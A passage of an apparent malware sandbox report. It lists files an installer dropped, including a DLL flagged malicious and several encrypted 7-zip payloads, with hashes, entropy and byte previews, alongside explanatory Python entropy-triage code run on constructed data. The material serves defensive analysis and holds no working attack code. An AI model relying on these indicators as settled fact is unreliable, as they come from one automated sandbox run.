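# Constructed samples; the first two names are the report's drop names, the bytes are not.
SAMPLES: Dict[str, bytes] = {
    "update.vac": constructed_bytes(b"MZ\x90\x00", 65536, 1),
    "7zr.exe": constructed_bytes(b"MZ\x90\x00", 65536, 2),
    "blob.7z": constructed_bytes(b"7z\xbc\xaf\x27\x1c", 32768, 3),
    "zeros.bin": b"\x00" * 4096,
}


def triage_all(samples: Dict[str, bytes] = SAMPLES) -> List[dict]:
    """Run triage over every sample, in insertion order."""
    return [triage(name, data) for name, data in samples.items()]


if __name__ == "__main__":
    for row in triage_all():
        print(row["name"], row["file_type"], row["size"], row["entropy"],
              "encrypted" if row["encrypted"] else "plain",
              "EXTENSION MISMATCH" if row["extension_mismatch"] else "")
```

Entropy near 8.0 on a multi-megabyte blob, as the records above show for the .vac and 7z payloads, is what drives the Encrypted flag; a real PE with code and data sections normally sits well below that unless it is packed, which is why the flag is worth reading together with the file type rather than alone.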
                          Process:C:\Users\user\AppData\Local\Temp\is-4E5DT.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmp
                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):3606016
                          Entropy (8bit):7.0063494494702985
                          Encrypted:false
                          SSDEEP:49152:/MifTj964EMRY42Kgq7eJEJqx2dhZe71MzuiehWIKxZfAtbyBSfbZmSKiyQF:/M+jcZ42KXw2dhZe71MzSRFyBSDH
                          MD5:95ACD5631A9131DB1FD066565AFC9A67
                          SHA1:8E9473BD632FF0F57FC34EECAC17174341D80D94
                          SHA-256:EA6B71519CD54AB523B822F84D5D4E5B305214DA4C37E96A02D8BC1CB182F58B
                          SHA-512:70188E7AD6B0D9DA5E88EEFC6095F99066F73FDAB10F084E3F2F96B30D8A717BAE75E9C1B476FB996BC86B9A753AAF26F96024D0068090B437EACE6E5BE35681
                          Malicious:true
                          Antivirus:
                          • Antivirus: ReversingLabs, Detection: 24%
                          Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....Fig...........!.....h....................................................7...........@.........................XC.......J..<....07.X....................@7..?...................................................K...............................text....f.......h.................. ..`.rdata..T............l..............@..@.data................b..............@....00cfg.......`(......"(.............@..@.tls.........p(......$(.............@....voltbl.F.....(......&(..................#.q....P.....(......((............. ..`.rsrc...X....07.......6.............@..@.reloc...?...@7..@....6.............@..B................................................................................................................................................................................................................................................................................
                          Process:C:\Users\user\AppData\Local\Temp\is-4E5DT.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmp
                          File Type:data
                          Category:dropped
                          Size (bytes):1676465
                          Entropy (8bit):7.9998930894979035
                          Encrypted:true
                          SSDEEP:24576:CgXC6MkmDNAh7Oh81cHWpSFrTRHzvGo9Tw9LvT0wizEvy1vbNtWwAmPC7pkW2A+v:CT6jmDygh8KWpSF9z9TwVL0w5y1Lb+4v
                          MD5:6ED5E5FC8671A4CF1FBC61D9434C67D8
                          SHA1:7BED7036264A0794C60D766B0B79860838917BF6
                          SHA-256:480A033FF4FCC9E64D48ED456E9162E05979F9ECF988CDF1DAB29E001F73D6B7
                          SHA-512:EB3BBD792491F152510492291784C8622D852C354487B5095F72DF94B89E68602E7CC9DCF7F03230EE8918D20E849BA7671F328BC924AB65FE7EFF44321289D4
                          Malicious:false
                          Preview:.8*...z....L.gG..Q@=...c...yj..ENkkT.2[.[e...n.[..0@.T..[.:Ru8....N~...{x.5".g.n...x.5`...x5.....;O...BCN......W.."...C}.i'.....u.j.b.m..J.kX2...91.t...kp.Ns...Ew.0S....'.e9\I..E.5;6UN..:...2.... ouL.y..M...S...mh........h.#;&.a.....=..7.......|#1.4~V;..|..E..{...Y..v......l6u*r..+.....y.HY.w..\[..4..~T.`..r......bh..".-..(......7M@...1.....zd%.9.7.....vMc.-.s`...*...D...M...U..".....3.4&.T..mU ..,.i1.L.z8wn...FQ@b@.P+....]x..v../..c........`.V...=...'.8.M._..Q~.5vj...^..J.o.9....C................k@...T..I..&.m..xh.......GV...81.X....~.X..%I6......Vy.....Q.l%~..]d..g]"...>.^..G.x.%....Q...Mu.B....E....-...4.3X.5.9%B.N.......R0f.W>.i.w.|.F....D...*s.y....4b...>.....R.D.Y.#H=..G..N).X7l.p.NV.......,.._m....nhub.-...5.3?....|.$..d...^.B..0Z.O..xUH.... .b..?.........b.M...R.<W`.K..9BR..4]X&.........>.!.~...Z.d;.2L..!aT.2.".4 .cd.,...G...ksQ.`.&................vu....z.|gSa.U...}.....:.c.....=..i.RE..I..ae.9.i.0d.._.......a.<.c.hS.pX..D.SD
                          Process:C:\Users\user\AppData\Local\Temp\is-4E5DT.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmp
                          File Type:data
                          Category:dropped
                          Size (bytes):1926576
                          Entropy (8bit):7.99990648888762
                          Encrypted:true
                          SSDEEP:24576:6S/dQNKzV4tTimpkvIx+bSYfhQl17L075lY7SjPYLLRm5Ejypbemets9kl2kXKW9:6SFQN1xozfC/70DWKECiW9ZKlAvg
                          MD5:63172D15278B00589C32D8B0A2F876D9
                          SHA1:6677C180B516A02FA9CA8723F1AFFE4B2C75F24D
                          SHA-256:2B63CCE0AAEC9E0C7E47C840836AA8F085CDB28C557C406932756BD4F2D7356F
                          SHA-512:783E77E5130FBB3D17BFFCAE50839B50A8B2A1BB71474C801517A3C4CFDC16583FBFAF14DC8FFFB3158CF08E6F6A1FFCE37E24A390668092E2BA7FF3789E53F1
                          Malicious:false
                          Preview:.@S.....8...................I(....*..jU..m.s.............d...&\BH)X..w..T....s..b..-...........T.oBy......7.UGwO...,Q..^...^..T...d...`..ZS9G..C/...-(.;...:....<`...r-..B.E...|.-.h...Vp.].......xU......7.~....D..j.m..iN,L..K..U!...w.c.rS.........k.....u...C.....0.G...8.<e.x......5L..M.,}.a.kw....`...i.....AFt.dqY..*.8..ML..>.|..Z\7."X.S.X.k...wl.....d.....e.qp#....YO#.Uu.wC.................L7..$...5.H. \-I..md.............d............w...4-.....O.B.[.;.1.F"..T.My(.].L..5..~9r......;yK..u.....sa-....?.....M...r....N.b.u....2.E.Q.C.. .....5...GP...,.A...%;.f_<...D..Q.k.Y5.....k...0.1..L#...KB.....H....s...J..6.W.2..j...$..u>.L.(...P.....^.4.<...@..p...mra.J.h.....s...ep!.[Qv.K...3....~..Q.g.-=...".qA....k.i".G6.P..{..&1.*Xr..v..FF.O.mU.<@..a?.ELy.X.Y..._.(5.Y.?.....}g..\...a..........".#..q..2yC.....7....[...{.a..`.X7.T..e.|.....g_<b..Rr..x.0.....Ni.Kh......c...H........U|[.3.../a..2b!.....(..N....!...#1....nrD...lw.F..=.H..A.C.)..Z..c.3..Y...
                          Process:C:\Program Files (x86)\Windows NT\7zr.exe
                          File Type:data
                          Category:dropped
                          Size (bytes):56546
                          Entropy (8bit):7.996960035347929
                          Encrypted:true
                          SSDEEP:1536:gmPYJlF+BlcIqK3RGxMyUryoNSJ9aeXZaFSy7muve:gWYJlF+GggeSXQS+mP
                          MD5:65D2D8DCB0AFFCA8518F46F1E9CB2265
                          SHA1:658034B71E4B4DF1997C08D0B739FD079801511D
                          SHA-256:9FC3ECB634743C29AFA189E57A57B3DC324D653020965B83716AD4D7ED21DB93
                          SHA-512:1548B7FF05971103D0B737979C7FD43EA04BB9CDAFD09387424E4E7DA5D50A620378B1A71D5E04019E5A0D998A0E8BAD350B3335A5B2778417B19656167F2B52
                          Malicious:false
                          Preview:.@S.....(o^l ................V..T&..N5j}.......d.4...A...!....2...<O..X(.^...}.G..B..]4c.V........D.n......$t.3.+T.A.J'R....S.b..$..i.08.......Y^.7......#....|....@..\%..6.3.=H..l.5..o..G........4Q..?..7..>.v....cC....D..........[t........3....Qxn@.P...5...........=i!...D.u%.a.d.....3...1.....R.K.=..D.Q...E...w9....\..4...9.[..ym.4.w5..c...8N....."......{B=lkb'$N..2....Y.7tA..;J...B.I..B.b.?.......|G.!_.}y.c........EH].OhY..M.....y..R....:'......b.......tz?...M.&...Oc.'....~....N.9/...x....3...>,..$t......|.>.T. ..}.J....K.y.F..%...\l.X...l.(n.x...]..3........*=B....a....;....k...,L.v/.1.[-H.'....i..DL..)QD.....;..v${...,}LiR..|>*a.....~..rQ...5....V..@.%...^..kteIs.....W.4Y ..N.bV..B~{.............L6..W.....{.e.."....2..3N.5..K].~.<.N.M..........1.q\v7.).....,|.P..Z.).....Ic..X..|B.l' H.......A<j.]|%...7.W:P;..g~...7L./.A..S.9....Ka.P..P....y.aJ.-.g~......1.;$.....~..*&..ja..Io.[7@.&.u....qs..M$.m..el...j..$...o......'Ny..d..Hb.!..J...
                          Process:C:\Users\user\AppData\Local\Temp\is-4E5DT.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmp
                          File Type:7-zip archive data, version 0.4
                          Category:dropped
                          Size (bytes):56546
                          Entropy (8bit):7.996960035347929
                          Encrypted:true
                          SSDEEP:1536:/fWE4JV7mb19SJJDAuh0bTzhoDJ2zlf5mZ4SxjkAUeHK8LB:0JV7mB0v0wWzh3A4SxjkAl9t
                          MD5:A9A4C60ED1964B3AB9343EB527C63AF9
                          SHA1:D8A202D32E23778D0D82B3C26EBB226EDF18EDF6
                          SHA-256:6630BE633F99409954C8FD8A5A0823777726798662562A2C2060027CB9B4D697
                          SHA-512:1B00F48F123F596BB13FCDE6B1966B93DB49F95F23F8EFD35752A550967C0A3FBA64353A6927F310B8E7D808EFDE82220D3C1D62EDF345660AFA5146E7D06A37
                          Malicious:false
                          Preview:7z..'..............2.......P.>{........eO+./*w..T.FoV.u.@.C`U..?J~C..=...R.unj....^.O..e.;.M^.a..<.}.KF.$.9.....N......[.=.pY.r,.E..M2....._..u..I5s..%.A.pd.P....EV.."$.......N.U.....Lh..'/j.g..x....6..g..D.Yd..C2..@o^2}..B2.+..5J.6.41...1?_..O`.......+-f.mA.L.,.$6y.^9....~.......+.9.E'..Tm...-.M..q.'.D..l.....y.h..>.:.e[...$d.C..@..../..\...t...24.`..O.x................[.7.....W.'"6X.r.g9b.)B.S.VB..TkF..C.a..g..&.#<'7....;d...Q..6._....9..2R5LJ..........j...U....86.N.=G#....o.-&./..*.K..Lc(..Rb..s$...js.;..K7..Q...k.....Y....T.M...a...9...s....a.D....R.....!pV.`...Z...(9%...a?en......Oy$.4h....9..T.Os[......>...W.u.w..`.....t....[<...;3....r6..t\....P.........t.f......_.=d0.....C..&......w..3Ly.#,..Y....5.nRg]u....(]..uy...p.9.y>..D....K.`.y...W:,WE..<............J.}k...*n@.E.6.Q,..S...BW..w|{c.^d.......;...#...n....^....\......D..k..a.`..ve.}3....l.`..#....L.N..m....-To....J..p!..m..S.*..I~*A...,..M.x...v.h.4-.w!.xQe6....Tp.rS..^.Ca..T%
                          Process:C:\Program Files (x86)\Windows NT\7zr.exe
                          File Type:data
                          Category:dropped
                          Size (bytes):56546
                          Entropy (8bit):7.996966859255975
                          Encrypted:true
                          SSDEEP:1536:crCPEbYP46GiC3q6cGOlLvjmS9UWgvy/F2QFtTVAe:iCIR913q8wjmS9bhKe
                          MD5:CEA69F993E1CE0FB945A98BF37A66546
                          SHA1:7114365265F041DA904574D1F5876544506F89BA
                          SHA-256:E834D26D571776C889E2D09892C6E562EA62CD6524D8FC625E6496A1742F5DBB
                          SHA-512:4BCBB5AD50446CD4FAD5ED3C530E29CC9DD7DDCB7B912D7C546AF8CCF7DA74BC1EEC397846BFB97858BABC9AA46BB3F3D0434F414BBC3B15B9FDBB7BF3ED59F9
                          Malicious:false
                          Preview:.@S....c...l ...............3...Q...R]..u&.(..c...o.A..q?oIS.j..O[..o..&....L)......Rm.jC,./....-=...Z.;..7..tH..f...n#.7.P#..#o..D..y....m........zH.!...M.|......Vs.^.Rb.X`....y.T.Sg....T.....E.?/.H.;h.)P.#.pz.LOG$..."L(.....?.D*.6g.J!.>.....f.....J..B..q...;w]9.v...V...$....L/m.H#..]...G....QQ..'.z.!NW~..R..y....E.)....m.k%....+....>....02../..M....b.l..f7..f?-~_..E.5.~....*.'....8?.n........x...#....9.........q.q.n...\....D.Uv9.9...P.j7P~q9[BV...>C..[F..k-UL(jfT..\..{d.v;.5.e.fb.3^+...Z|]S3G...$..H=.W..c...B...).v.D!...s...+.K...~=..l.2...X.m.-....m0.....p...>...d......e.J..gUr*4....vw.........T.cQ......\...]...Z{..q..n..'Ql.$..V.U9..j 4...9<..6i.....5.F.).k.LQ4.H...2..p.*.bQJ..4.K'C...#.%"q.u../zoXL...L...........'..g11=E.....y.8...~.Oe..X....u.M8.T.....Qq.m.........i....F.4e.([Hm.*...E....2........s. *R..{."4.x.]...-.....xQ@.z.......Bz.).[..C...T..".....q............M.X..CQ..A..........d...`S.3...e.X.....u.>.!..;k...>..
                          Process:C:\Users\user\AppData\Local\Temp\is-4E5DT.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmp
                          File Type:7-zip archive data, version 0.4
                          Category:dropped
                          Size (bytes):56546
                          Entropy (8bit):7.996966859255979
                          Encrypted:true
                          SSDEEP:1536:cWsX30GkPK2rw7bphKKdxDBxjqtalDFMflaX4:cZXhkPhr+TRJqtaK
                          MD5:4CB8B7E557C80FC7B014133AB834A042
                          SHA1:C42E2C861FF3ED0E6A11824E12F67A344E8F783D
                          SHA-256:3EC6A665E7861DC29A393D00EAA00989112E85C6F1B9643CA6C39578AD772084
                          SHA-512:A88E78258F7DB4AECD02F164E6A3AFCF39788E30202CF596F9858092027DDB2FDB66D751013A7ABA5201BFAFF9F2D552D345AFE21C8E1D1425ABBC606028C2E6
                          Malicious:false
                          Preview:7z..'....O; ........2.......D.X..Z.2..7nf..R..s# s..v.f.....%G..>..9..Jh.-j.r..q.2.=v..Q.....SW7....im..|.c...&...,.s....f.h...C.g~..f.7=9...,...sd....iD......cR.^...$..<....nd...S.O..E)0..SQ.AA.C..$.D.|. a.:..5.....b.....2......W.....Z.pS.b/.F.;|`...O/....@.......4.".b.(...4...,..h/.K$..r!...."..`.S...D?.":...n..f.{C..t..,/.S.0.N..M...v...(.Yn..-.)..-...N~....}..).. .j!...1H.7?R..X.....rKi....9.i[k..+.....Br\.=.k.t8...6Lmh.../.V^K.f.......*.@MM..`...,W.......E..v.H....0.W..~....I.....w....<....X.Azl.FH..6\.a..E?=..I.q.5...s...;.,J.0..J.../.w..,..n.EkN..,j....f.y&q.C}fnY..2\......0.....N!.J..H.H0.....BJ.Q..v}=......^c.'w..#...d.T1....#...2s}N.....2.%.?. ....l.).....a<5Y.s....}...2*.#s..]0h..._G....3].....7y.}.B.6...ywE....'q.....h..?p .#..Emm2..F..| .M.Rv!.v.G....1L.Kx...T...".a6.%S0..g..7.......J.vjO.{.A....B@.c.y>}.....N.+....:.L=[....._.....Y.{....F..|.w.oX..t&[.....a\.M..2.Qe.[}L.Ch[...G.S#.$9...8<..W.d1...*PH.`.....4.A.......?..g.
                          Process:C:\Program Files (x86)\Windows NT\7zr.exe
                          File Type:data
                          Category:dropped
                          Size (bytes):31890
                          Entropy (8bit):7.99402458740637
                          Encrypted:true
                          SSDEEP:768:rzwmoD5r754TWCxhazPt9GNgRYpSj3PsQ4yVb595nQ/:vwmolXaT9abVzP1TC
                          MD5:8622FC7228777F64A47BD6C61478ADD9
                          SHA1:9A7C15F341835F83C96DA804DC1E21FDA696BB56
                          SHA-256:4E5C193D58B43630E16B6E86C7E4382B26C9A812D6D28905DD39BC7155FEBEE1
                          SHA-512:71F31079B6C3CE72BC7238560B2CBD012A0285B6A5AC162B18EAE61A059DD3B8DBCF465225E1FB099A1E23ED7BDDF0AAE4ED7C337A10DC20E0FEEC4BC73C5441
                          Malicious:false
                          Preview:.@S......................xi.\ .~.#..:}..fy?koGL^|kH.G...........x....Tg.Y.t....~^..".L.41.....R..|.....R...C.m(.M&...q.v.$..i..U.....).PY.......O.....~..p.u.Y.......{...5^q.|a.]..@DP".`Rz}...|N.uSW.......^..o...U..z...3...bH........p.......Y`..b.t.x.F^i.<.%.r.o..?w.Z..M.fI.!.a...Zsb.+.y..W...n.....;...........|.{.@Q.....#".M...4.A).#;..r...>E..]w{.-....B...........v..`...S...sY....h.Sa)...r.3.U;n8wXq.x...@^z...%8H.Zd._..f~.....u[..q$..%......C..../].rS.....".=..<o.<S....-^"..iIX..r...D.......k.P.e...U..n.]^p..pal....E.c..+..Gc..U?s.R...p...:>..v..o2..B.Hn..q...F..3.o...%.......C......*.V..|..2.J..i.r....|;T.C6).......a..~"K....Y.....]3.{{..N...X>.1.....:?....,..T+=s...............so.;....&....Q.\K..b............k,..#l...Yb...VE.g.3v.$'.H3......w.....{f..e.....PS.tQ..*.8a....5w....\8%..c.;......q.j.t0/.8s..(9....... .S...0.o.o......f*..]....U..>N....Kc/..ka.I"O-O.!./..S".IN .....%G...........x%..ZL`Sq.;.}w.`..k.....F.........Tp..}..?t..
                          Process:C:\Users\user\AppData\Local\Temp\is-4E5DT.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmp
                          File Type:7-zip archive data, version 0.4
                          Category:dropped
                          Size (bytes):31890
                          Entropy (8bit):7.99402458740637
                          Encrypted:true
                          SSDEEP:768:jh43RfBLJT55mgLMoqX3gX/i69sXCuWegxJr8qF88M:qhj+I7qCKNSegPnFM
                          MD5:CE6034AFC63BB42F4E0D6CD897DFBCB8
                          SHA1:49E6E67EB36FE2CCAA42234A1DBB17AA2B1C7CC0
                          SHA-256:7B7EB1D44ED88E7C19A19CEDAA25855F6800B87EC7E76873F3EA4D6A65DAA25F
                          SHA-512:7801FA33C19D6504FF2D84453F4BB810FD579CB0C8772871F7CC53E90B835114D0221224A1743C0F5AAE76C658807CC9B4EC3BEC2CAD4AB8C3FD03203DAA7CF0
                          Malicious:false
                          Preview:7z..'....oYU@|......2.........Z....f..t.#.............tb.7E..Jo.........b.I=.Y..6(..=....^..>i.^E.."q.$&8....N...p+.p. .P.z6.b,.8kdD......'...G.R.n.&5..C..H.E..So!T^n{.a#d....z.SB........Nb.........LO+B ...iV..HH.Cc*.o@|.....Yvxb^.cW....._.........m.}.(V.i.H$....R....`.M.p......A?....._..nb..D.*RT<bUV.n].....LD.qU.....U9....]...h..y!...I....&C......g`...YahZ.q4.{.....2ZRG..f.. .M....:t .........8..Eg.....o.....h.]{..........p...M...lh.@.(R.]!B.:...b78$...b.......hc...C~....I..B<.x_OB|...<. .=NZ.....z........sjJ.....*{<..L.......^...9..^d..$d..}......#.dL'~.}....M...j.(5..@.tcVm.H..-.n...D..&....<..Z...@]./7?...[..qfW..!...v...==..d..M..om~).....C..9....c<..WUV.ed.h...]....OCt(X.H<<:.9..{5j....Nh.L.$..>..D..haP..~...............}r=!.E.ng..........9+...2.g.H3Lx.Bu....]jC...q.g.g.U.4..<........)....oo.T.c_.......X.,.@...nu......D.B(~.5....x5...............4S7B..p...Uk.0-m.VM.M@.V\.o...(......".k..w....Z.([.@.MQ.i9..."W..m...N.,.
                          Process:C:\Program Files (x86)\Windows NT\7zr.exe
                          File Type:data
                          Category:dropped
                          Size (bytes):74960
                          Entropy (8bit):7.99759370165655
                          Encrypted:true
                          SSDEEP:1536:x2PlxAOr0Y07RqyjjkFThaVNwDsKsNFBrFYek36pX4MDVuPFOnfIId+:QAOrf07RHjkFThaVGMLF3hNDcPFOn5s
                          MD5:950338D50B95A25F494EE74E97B7B7A9
                          SHA1:F56A5D6C40BC47869A6AE3BC5217D50EA3FC1643
                          SHA-256:87A341B968B325090EF90DFB6D130ED0A1550A1EBDE65B1002E401F1F640854A
                          SHA-512:9A6CC00276564DDE23D4CABA133223D31D9DDD06D8C5B398F234D5CE03774ED7B9C7D875543E945A5B3DB2851EC21332FE429A56744A9CC2157436400793FF83
                          Malicious:false
                          Preview:.@S........................F.T....r...z'I.N..].u.e.e..y.....<|r.:v.....J.i...L.Sv.....Nz..,..K.sI*./.d.p.'.R.....6eF....W{."J.Nt'.{E....mU_..qc.G..M..y.QF)..N..W.o.D!.-...A$.....Nc.(...~.5.9'..>...E..>.5n..s..W.A7..../..+..E.....v..^&.....V..H6..j..S`H.qAG.R.i^&....>@SYz.@......q.....\t=.HE...i..".u.Z.(y.m..3.0\..Wq9#.....iH7..TL.U..3,b........L...D..,..t(mS..06...[6.y....0-....f.N7..R......./..z.bEQ.r..n.CmB'..@......(...l..=.s........`.6.?..[mzl....K.5"..#*.>.~..._...A.%b..........PnI.T...?R~JL<.$V..-.U..}\..t/F..<..t....y(K..v..6"..'.!.*z.R....EJ0.d<v:.R&......x...2....;Tc..(..dW...7a.)...rq.....{"h.wbB..t)f..qj........~.XR.a/........l./.S......".%?.C.cL._.,k.n'....a./.z...{.]...<......._pFP..d..,......Q...[........3...Kq).rJ..8..I.)o...i'Q..=......(dq(.m../..%=.......r m.X|3.......b.~tA.......%+.T..E@..ce...%....,..x#...,....-....A...q.....r.+...?......L..%.c.... ..>.Iw......P...O)...$`.'..D1.r.....*..9;..R...VL.]..%j.....TM.4.....P.L...
                          Process:C:\Users\user\AppData\Local\Temp\is-4E5DT.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmp
                          File Type:7-zip archive data, version 0.4
                          Category:dropped
                          Size (bytes):74960
                          Entropy (8bit):7.997593701656546
                          Encrypted:true
                          SSDEEP:1536:xsn0ayGU0SfvuEykcv5ZUi4Q9POZBgfmWRDOs2XwV1NN4+8wbr82nR+2R:xY0ntfvwkcv5ZwYPCBgfmW/VDS+FbrLN
                          MD5:059BA7C31F3E227356CA5F29E4AA2508
                          SHA1:FA3DC96A3336903ED5E6105A197A02E618E3F634
                          SHA-256:1CBF36AFC14ECC78E133EBEC8A6EE1C93DEA85EEC472CE0FB0B57D3E093F08CC
                          SHA-512:E2732D3E092B0A7507653A4743E1FE7A1010A20D4973C209BA7C0B2B79F02DF3CFDB4D7CE1CBFB62AA0C3D2CDE468FC2C78558DA4FF871660355E71DC77D8219
                          Malicious:false
                          Preview:7z..'....G8{p$......@..........0..$D.#'7..^..G.....W.K^.IC;.k...)_...S...2..x.....?(..Rj.g.......B...C..NK.B0s..L?.$..].....$r..E.]~...~K..E..3.......t..k..J......B...4.?!..6r.Qqc.5.r...\..,A.JF.J...Vb..b...M.=^.K7..e..]...X.%^3T...D.y..e2..>...k...\...S.C....')......hhV..K...z4..$d....a[.....6.&.D.:.=^.8.M[....n..i[....]..Y.4...NpkjU..;..W5.#.p.8?u....!.......u.[?.$..^.}f.A..G.N...b7.*...!!.(.....Gc..........Dg....Z.*.#.\".e.m.).t.5..r...6"....Q......fx..W......k..K7^."C.4*Z.{.^WG.....Z..P......Z....7R.....5hy...s....b.....7.V.....k.=.y.i.i......Y.......FY$.|T.5..V...E|...q.........].}bl...y.....;...q....-a..RP3..L~k....|..p_......."......rJz."..v......Z....l1.O.N...Di...O.:m.X...W.......x..}..>ktk.,.~...n-.m..`...G......$.....].lPx..<..9.m4.n...d....G...{'.a........u).R.+.....y.`.p...1@..!..b...J.W..Vt,......h...k....W.,..@Sd.<ZG......}&.R.]p(Y...o...r.4m:.J`.U..S5.iN...^!Y..hHP.B.58....JvB.K.k;...4........\.6=&erz..2..&...Z.C...h_.
                          Process:C:\Program Files (x86)\Windows NT\7zr.exe
                          File Type:data
                          Category:dropped
                          Size (bytes):29730
                          Entropy (8bit):7.994290657653607
                          Encrypted:true
                          SSDEEP:768:e7fyvDZi63BuPi2zBBMqUp6fJzwyQb91SPlssLK4:AfKNiG/2vMx6fJzwVb2tss7
                          MD5:2C3E0D1FB580A8F0855355CC7D8D4F7A
                          SHA1:177E4A0B7C4BC8ACE0F46127398808E669222515
                          SHA-256:9818FEBDE34D7E9900EB1C7A32983CA60C676BE941E2BC1ED9FBD5A187C6F544
                          SHA-512:B9410FC8F5BE02130D50E7389F9A334DD2F2A47694E88FBB9FB4561BD3296F894369B279546EEBB376452DF795C39D87A67C6EE84C362F47FA19CF4C79E5574E
                          Malicious:false
                          Preview:.@S....*z.p,..................kcn..a.^.<..=......7`....6..!`...W.,2u...K.r.1.......1...g<wkw.....q..VfaR...n.h.0b[.h.V$..7.7'd.....T.....`.....)k.....}..........bW'.t..@*.%e5....#.6.g.R.......,W....._..G.d...1..e/...e7....E.....b....#Z,#...@.J.j?....q.ZR.c.b.V....Y-.......3..&E...a.2vg$..z...M9.[......_.1U....A...L.0+3U.[)8...D........5......[..-.u...ib...[..I-....#|j..d..D.S.'.....J.`.....b..y...Iu.D.....2.r}.4....<K.%....0X..X[5.sD...Xh.(G...Z;.."..o..%.......,.y..\..M6.+,.]c..t.:.|...p%.../1%.{>..r..B..yA.......}.`.#.X....Rl`.6\~k.P8..C....V\^..2.7...... h. .>....}..u)..4..w..............^N...@.v....d.P...........IA.. G?..YJ>._La..Y.@.8N.a...BK.....x.T....u.....\x.t...~.2p.M..+.R&w.......7c!v.@..RGf.F.>^+.b=........@l.T5.:........#}.%>.-.C.[XR.TG.\..'....MH..x..Y...cL........y.>....%...:.S.W^..k.EE.5O`.6<5-kh_...."95..:p....P.jk`....b.7.Z.8Y....H(j2y..`d.q;RyZ.5$..3.;......0,......+O.....L.,..u.s....S.1o.g...l"..e.....Cy<....I.+..B@......~.0...<.
                          Process:C:\Users\user\AppData\Local\Temp\is-4E5DT.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmp
                          File Type:7-zip archive data, version 0.4
                          Category:dropped
                          Size (bytes):29730
                          Entropy (8bit):7.994290657653608
                          Encrypted:true
                          SSDEEP:768:0AnbQm4/4qQyDC44LY4VfQ8aN/DObt1dSt3OUqZNKME:0ab6c4oY0aBDObjot+Uqu7
                          MD5:A9C8A3E00692F79E1BA9693003F85D18
                          SHA1:5ED62E15A8AC5D49FD29EF2A8DC05D24B2E0FC1F
                          SHA-256:B88E3170EC6660651AF1606375F033F42D3680E4365863675D0E81866E086CC3
                          SHA-512:8354B80622A9808606F1751A53F865C341FF2CE1581B489B50B1181DAA9B2C0A919F94137F47898A4529ECCCD96C43FCCD30BCDF6220FA4017235053AF0B477D
                          Malicious:false
                          Preview:7z..'....G..s......2......../.....h..f...H=...v.:..Q.I..OP.....p..qfX.M.J..).9;...sp......ns./..;w....3.<..m..M.L...k..L..h[-Dnt.*'5....M(w%...HVL..F&......a...R.........SF.2....m@X&X5.!....ER......]xm.....\.....=.q.I.}v.l#.B........:.e....b6.l.d..O......H.C..$.',.B..Q\..\.B.%...g...3?.....*.XuE.J.6`.../...W.../......b..HL?...E.V[...^.~.&..I,..xUH..2V..H..$..;.....c.6.o........g.}.u:.X....9...|Ynic.*.....ooK..>..M~yb..0W....^..J(S......Q?...#.i.1..#.._.9..2E.S7c.....{..'...j.A.p......dS]......i.!..YS...%.Q<..\.0.....FNw....e...2...$..$4..Pv.R...mv...-.b.T.)..r*..!..).n4.+.l[.N...4qN....w.B..[......<U.etA.A....SB..^y.......^0.f._.&..Z.zV.%.R.f_dz.,E..JJ..%.R.7.3m.:..;.`...AoHLHC..|..)f...C....$...E....H"x..F....wW...3"......Y.*Y.....5....,E...tn.KS...2......w\Z..1.".O.=+..A...2.....A.........k. c..../2..i!q..q...u.'.m.6.j.\.....x...S....$....*.&(.).^..f.d.g"j..#^....W.]{.C.?2Z.'X...5.._@..q.j..Xb...n{1..<.i...'r...7'.F.L\(.8
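A check worth running on the pairs listed above: three of the 7zr.exe "data" outputs and three of the installer's "7-zip archive data" drops share byte-for-byte identical sizes (31890, 74960, 29730) and identical "Entropy (8bit)" values to at least 14 significant digits, yet every hash differs. Shannon entropy is a function of the byte histogram alone, so identical size and entropy with different hashes is what the same bytes in a different order look like (a rearranged header, a re-chunked payload); that is an inference from the figures, not something the report states. The following is an added example, not part of the report or of any tool it names; it reproduces the report's entropy figure on constructed input and shows that a shuffled copy keeps the entropy and histogram while the hash changes.

```python
import hashlib
import math
import random


def byte_histogram(data: bytes) -> tuple:
    """256-bin byte histogram; entropy depends on nothing but this."""
    hist = [0] * 256
    for b in data:
        hist[b] += 1
    return tuple(hist)


def shannon_entropy(data: bytes) -> float:
    """Shannon entropy in bits per byte, the 'Entropy (8bit)' figure a
    sandbox file listing reports (0.0 for a constant file, 8.0 at most)."""
    n = len(data)
    if n == 0:
        return 0.0
    # Iterate the histogram in fixed order so equal histograms give
    # bit-identical floats, not just nearly equal ones.
    return -sum((c / n) * math.log2(c / n) for c in byte_histogram(data) if c)


def compare_pair(a: bytes, b: bytes) -> dict:
    """Triage two dropped files that share size and entropy: a permutation of
    the same content has equal size, entropy and histogram but a new hash."""
    return {
        "same_size": len(a) == len(b),
        "same_entropy": shannon_entropy(a) == shannon_entropy(b),
        "same_histogram": byte_histogram(a) == byte_histogram(b),
        "same_sha256": hashlib.sha256(a).digest() == hashlib.sha256(b).digest(),
    }


# Constructed sample input (not taken from the report): a pseudo-random blob
# standing in for a high-entropy archive, a byte-shuffled copy of it, and an
# unrelated blob of the same size.
_rng = random.Random(1580391)
ORIGINAL = bytes(_rng.getrandbits(8) for _ in range(4096))
_shuffled = bytearray(ORIGINAL)
_rng.shuffle(_shuffled)
PERMUTED = bytes(_shuffled)
UNRELATED = bytes(_rng.getrandbits(8) for _ in range(4096))

if __name__ == "__main__":
    print("original vs permuted:", compare_pair(ORIGINAL, PERMUTED))
    print("original vs unrelated:", compare_pair(ORIGINAL, UNRELATED))
```

When two drops match on size and entropy but not on hash, compare their histograms before concluding they are different payloads; a matching histogram says the bytes were rearranged, not replaced, and the next step is to diff the two files byte by byte rather than to treat them as two unknowns.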
                          Process:C:\Users\user\AppData\Local\Temp\is-4E5DT.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmp
                          File Type:7-zip archive data, version 0.4
                          Category:dropped
                          Size (bytes):1926576
                          Entropy (8bit):7.999906488887622
                          Encrypted:true
